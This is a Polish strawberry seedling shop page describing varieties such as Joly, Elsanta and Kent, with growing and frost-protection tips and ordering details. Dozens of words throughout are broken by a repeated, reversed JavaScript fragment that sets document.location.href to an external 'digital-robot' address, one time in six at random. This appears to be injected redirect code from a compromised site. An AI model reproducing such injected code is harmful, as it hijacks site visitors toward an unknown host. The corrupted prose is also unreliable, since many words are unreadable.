   Wartobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to pamiętać, że selekcja nowych odmian truskawek we wszystkich krajach odbywa się pod kątem ich atrakcyjności, a więc smaku, urody, trwałości, plenności, tobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) tolerancyjności na określone patobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) togeny itd. Jeżeli np. na południu Włoch czy Hiszpanii wchodzi do uprawy jakaś nowa odmiana, która ma istobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) totną przewagę nad innymi, ponieważ cechuje się ogromnymi, niezwykle słodkimi owocami, ponadprzeciętną trwałością oraz niesamowitym połyskiem, tobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to chyba wartobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to (w przypadku uprawy amatobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) torskiej) nieco zaryzykować i posadzić ją w swoim ogrodzie (jak się uda, sąsiedzi pękną z zazdrości:-) Pamiętajmy, że amatobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) torska uprawa truskawek odbywa się zwykle nie w szczerym polu, narażonym na silne podmuchy mroźnych wiatrów, lecz najczęściej w miejscach zacisznych, osłoniętych budynkami, drzewami czy żywopłotami. W takich warunkach szansa na szczęśliwe przezimowanie będzie zdecydowanie większa niż na „wygwizdowie”, tym bardziej, że mamy do dyspozycji jeden z (moim zdaniem) najbardziej spektakularnych wynalazków ostatnich lat w naszej branży – białą agrowłókninę, dostępną w każdym sklepie ogrodniczym.

   Zadzwoń i zarezerwuj najlepsze odmiany dla siebie!
   +48 731 410 390
   Jesteśmy dostępni 24/7, również w niedzielę

   W ostatnich latach rośnie wśród plantatobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) torów i działkowców popularność tzw. odmian powtarzających. Odmiany te (ang. day neutral), w przeciwieństwie do tradycyjnych, kwitną i owocują od późnej wiosny aż do pierwszych przymrozków. Jest tobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to ciekawa propozycja dla tych z Państwa, którym tradycyjny sezon truskawkowy wydaje się być za krótki . Wiele odmian z tej grupy odznacza się niezwykle atrakcyjnymi owocami i tobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to zarówno w sensie smaku jak i wyglądu. Wartobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to wszakże pamiętać, że większość odmian truskawek powtarzających wyhodowana została w klimacie znacznie cieplejszym niż nasz (Floryda, Kalifornia, kraje południa Europy), dlatego mogą się pojawić problemy z ich przezimowaniem.

   Truskawek z tej grupy odmian częstobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to używa się do obsadzania najróżniejszych pojemników (skrzynki balkonowe, duże donice czy ample), i w tej formie mogą one stanowić niebanalną ozdobę balkonów i tarasów, tym bardziej, że, w przeciwieństwie do pelargonii, begonii czy surfinii, można je zjeść

   Ceny sadzonek truskawek

   Aby zapoznać się z naszymi cenami, należy kliknąć przycisk pod wybraną odmianą przenoszący do sklepu z sadzonkami truskawek (sprzedaż wysyłkowa).

   A otobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to co proponujemy Państwu w tym roku:

   Odmiana:

   • reprezentuje odmianę średnio wczesną
   • owoce charakteryzują się jędrnością, połyskiem, krwistobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) toczerwonym kolorem oraz słodkim smakiem
   • Dla tej odmiany wartobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to zadbać o wilgotną glebę – dzięki niej bowiem owoce do końca zbiorów pozostaną bardzo duże, a ponadtobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to nawet po zerwaniu nie stracą na swojej atrakcyjności
   • Joly jest dosyć łatwa w uprawie, przede wszystkim ze względu na tobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to, że jest odporna na wiele chorób oraz plenna
   • Odmiana ta nie jest jednak zbyt odporna dla mrozy, dlatego po okresie pierwszych, ujemnych temperatur (koniec grudnia lub początek stycznia) wartobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to przykryć sadzonki agrowłókniną
   • Joly doskonale sprawdzi się zarówno na dużych plantacjach, jak i w małych ogródkach.
   • chcesz zamówić telefonicznie? masz pytania? dzwoń: +48 731 410 390

   Odmiana:

   • Jest odmianą bardzo wczesną oraz bardzo plenną
   • ponadtobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to niezwykle odporną na mróz
   • Charakteryzuje się średnio silnym wzrostem oraz dużymi, podłużnymi owocami o słodkim smaku
   • Clery jest odporna na różnego rodzaju choroby
   • Doskonale sprawdzi się w uprawie polowej oraz pod tunele
   • Wartobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to również pamiętać o tym, że jest tobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to odmiana licencjonowana, a więc jej rozmnażanie jest zabronione.
   • chcesz zamówić telefonicznie? masz pytania? dzwoń: +48 731 410 390

   Odmiana:

   • Odmiana ta doskonale sprawdzi się przy uprawach ekologicznych i proekologicznych, a także w domowych przetwórstwie
   • Dipred charakteryzuje się wysokim plonem oraz odpornością na wiele rodzajów chorób
   • Jej owoce posiadają wiśniowoczerwony kolor oraz są niezwykle jędrne – nawet po rozmrożeniu
   • chcesz zamówić telefonicznie? masz pytania? dzwoń: +48 731 410 390

   Odmiana:

   • Jest tobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to bardzo wczesna odmiana, wyróżniająca się jasnoczerwonymi, błyszczącymi, dużymi oraz słodkimi w smaku owocami
   • Elianny jest odporna na niewygody transportu, dzięki czemu doskonale nadaje się na handel
   • Niestety jednak, odmiana ta nie jest odporna na mróz, dlatego po pierwszych przymrozkach należy okryć ją agrowłókniną
   • Odmiana pochodzi z Wielkiej Brytanii
   • chcesz zamówić telefonicznie? masz pytania? dzwoń: +48 731 410 390

   Odmiana:

   • Jest tobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to średnio wczesna odmiana deserowa, rodząca jasnoczerwone, duże owoce (pod koniec zbiorów stają się one jednak nieco drobniejsze) o wyjątkowym smaku
   • Elsanta jest plenna oraz odporna na szarą pleśń, jednak cechuje się wrażliwością na choroby układu korzeniowego oraz na mącznika
   • Nie jest również wytrzymała na mrozy, dlatego w okresie zimowym wymaga przykrycia agrowłókniną
   • chcesz zamówić telefonicznie? masz pytania? dzwoń: +48 731 410 390

   Odmiana:

   • Odmiana średnio późna, bardzo plenna, charakteryzująca się doskonałym smakiem i aromatem
   • Rodzi ciemnoczerwone, duże owoce, które jednak z czasem stają się odrobinę mniejsze
   • Senga Sengana doskonale się odszypułkowuje, dzięki czemu jest idealną odmianą przeznaczoną na różnego rodzaju dżemy i konfitury
   • Ponadtobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to jest niezwykle odporna na mróz, suszę, mączniaka, choroby systemu korzeniowego oraz nicienie glebowe
   • Niestety jednak odmiana ta jest wrażliwa na szara pleśń, a ponadtobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to jej owoce są niezwykle mało odporne, dlatego nie nadają się na sprzedaż
   • chcesz zamówić telefonicznie? masz pytania? dzwoń: +48 731 410 390

   Odmiana:

   • Najwcześniejsza odmiana truskawek, rodząca duże, słodkie owoce
   • cechuje się niezwykle dużą plennością, odpornością na transport oraz trwałością po zebraniu
   • Honeoye jest odporna na szarą pleśń, choroby liści oraz na mrozy – odmiana ta niezwykle rzadko bowiem wymarza
   • Cechuje ją jednak wrażliwość na choroby układu korzeniowego. Honeoye pochodzi z Ameryki Północnej
   • chcesz zamówić telefonicznie? masz pytania? dzwoń: +48 731 410 390

   Odmiana:

   • Jest tobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to odmiana amerykańska, powtarzająca
   • Oznacza tobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to, że owocuje od początku lata aż do późnej jesieni. Niezależnie jednak od pory roku, San Andreas rodzi duże owoce, które nie drobnieją, a ponadtobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to cechują się wyjątkowym smakiem oraz odpornością na transport
   • Odmiana odporna jest na wirusy, jednak jest wrażliwa na mrozy, mączniaka, choroby układu korzeniowego oraz podatna na pędziorka.
   • chcesz zamówić telefonicznie? masz pytania? dzwoń: +48 731 410 390

   Odmiana:

   • Średnio wczesna odmiana deserowa, która charakteryzuje się smacznymi, błyszczącymi intensywnie błyszczącymi owocami o sercowatych kształtach
   • Jest odporna na mróz oraz różnego rodzaju choroby, a w dodatku posiada niewielkie wymagania glebowe
   • Latem wartobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to jednak zadbać o ochronę przeciwko szarej pleśni
   • Odmiana ta jest idealna zarówno dla plantatobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) torów, jak i działkowców
   • chcesz zamówić telefonicznie? masz pytania? dzwoń: +48 731 410 390

   Odmiana:

   • Odmiana pochodzi z Holandii, jest średnio wczesna, plenna oraz przez odporność na różnego rodzaju choroby niezwykle łatwa w uprawie
   • Wartobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to jednak chronić ją przed szarą pleśnią
   • Polka rodzi średniej wielkości owoce, charakteryzujące się czerwonym, połyskującym kolorem oraz wyjątkowym smakiem i aromatem
   • Odmiana doskonale sprawdzi się jako składnik deserów oraz jako surowiec służący do przetwórstwa
   • Polecana jest na duże plantacje, jak i do małych ogródków
   • chcesz zamówić telefonicznie? masz pytania? dzwoń: +48 731 410 390

   Odmiana:

   • Odmiana deserowa, powtarzająca – owoce rodzi wiosną, a następnie w połowie lipca, aż do pierwszych przymrozków
   • Najbardziej plenna jest jednak w okresie późnoletnim
   • Truskawki Ostara cechują się średnią wielkością, jasno czerwonym kolorem oraz atrakcyjnym wyglądem
   • W smaku zaś przypominają poziomki
   • Ostara jest łatwa w uprawie – można ją sadzić do dużych donic bądź skrzynek oraz prowadzić jako odmianę pnąca lub zwisającą
   • Należy jednak pamiętać o tym, że ta odmiana powinna zimować pod okryciem
   • chcesz zamówić telefonicznie? masz pytania? dzwoń: +48 731 410 390

   Odmiana:

   • Późna, pochodząca z Włoch odmiana, wyróżniająca się średnim wzrostem, plennością oraz dużymi owocami o doskonałym smaku i wyglądzie
   • Arosa posiada przedłużony termin owocowania, jednak niezależnie od pory, jej owoce pozostają jasnoczerwone oraz w pełni dojrzałe
   • Po zbiorze zaś są bardzo trwałe
   • Odmiana ta idealnie nadaje się do upraw w gruncie i pod osłonami
   • chcesz zamówić telefonicznie? masz pytania? dzwoń: +48 731 410 390

   Odmiana:

   • Licencjonowana, późna odmiana deserowa
   • Jej owoce są bardzo duże, jędrne, wyjątkowo aromatyczne oraz należą do klasy 1
   • Posiadają również stobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) tożkowaty kształt
   • Florence zaczyna owocować już w czerwcu i jest niezwykle plenna
   • Dzięki jej postawie, jej owoce mają doskonały dostęp do słońca, co pozwala im uzyskać intensywnie czerwoną barwę
   • Nawet po zebraniu są niezwykle trwałe
   • Florence jest odporna grzybowe choroby liści oraz na wertycyliozę i zgniliznę korony
   • Toleruje opuchlaka
   • chcesz zamówić telefonicznie? masz pytania? dzwoń: +48 731 410 390

   Odmiana:

   • Odmiana powtarzająca, owocująca od początku lata do późnej jesieni
   • Truskawki Monterey są niezwykle duże, słodkie oraz nie mają skłonności do drobnienia
   • Ponadtobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to odmiana ta cechuje się niezwykłą plennością oraz odpornością na szarą pleśń
   • Jest także średnio odporna na mączaka oraz choroby układu korzeniowego
   • Na zimę należy okryć ją agrowłókniną
   • Monterey, ze względu na łatwość uprawy, polecana jest zarówno doświadczonym już producentobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) tom truskawek oraz amatobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) torom
   • chcesz zamówić telefonicznie? masz pytania? dzwoń: +48 731 410 390

   Odmiana:

   • Kent tobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to najczęściej polecana odmiana, ponieważ cechuje się plennością, wytrzymałością na mróz oraz silną odpornością na szara pleśń
   • Ponadtobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3) to nie wymaga silnej ochrony chemicznej i doskonale nadaje się na duże, jak i małe plantacje
   • Owoce tej odmiany są niezwykle trwałe po zbiorze
   • Niewątpliwą ciekawostką będzie z pewnością fakt, że przykrycie tej odmiany agrowłókniną, może zdecydowanie przyspieszyć czas zbiorów
   • chcesz zamówić telefonicznie? masz pytania? dzwoń: +48 731 410 390

   Cena sadzonek Truskawek się zmienia i jest zależna od odmiany i wielkości.

   Najtańsze Sadzonki Truskawek – gwarancja Jakości!

   Sadzonki truskawek wczesne, bardzo wczesne, średnio późne, późne, potwarzające – wszystkie odmiany znajdziesz w naszym sklepie.

   Korzystając ze strony zgadzają się Państwo na zapisywanie plików “cookies” na Państwa urządzeniach końcowych oraz akceptują Państwo regulamin tej witryny i sklepu internetowego.
   2020 Rock Bay Websites!